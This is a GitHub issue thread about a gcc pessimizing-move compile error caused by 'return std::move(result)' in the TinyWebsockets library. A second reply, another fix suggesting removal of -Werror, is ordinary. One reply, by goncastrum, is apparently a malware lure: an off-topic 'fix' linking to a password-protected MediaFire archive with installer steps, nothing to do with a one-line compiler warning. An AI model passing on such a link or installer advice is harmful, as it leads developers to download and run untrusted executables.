### ISSUE TITLE
pessimizing-move error in websockets_client.cpp

### ISSUE THREAD

**Issue by timbo100** [gilmaimon/TinyWebsockets#27]
I'm not sure if this error is platform specific but it appears that for my arrangement I have to modify the code to compile:
```
TinyWebsockets/tiny_websockets_lib/src/websockets_client.cpp:111:25: error: moving a local object in a return statement prevents copy elision [-Werror=pessimizing-move]
  111 |         return std::move(result);
      |                ~~~~~~~~~^~~~~~~~
TinyWebsockets/tiny_websockets_lib/src/websockets_client.cpp:111:25: note: remove ‘std::move’ call
```
gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by IvanJRCH** [comment]
Hi, I solved it by removing -Werror from all the CMakeLists.txt files I saw in the project

**Comment by timbo100** [comment]
Thanks
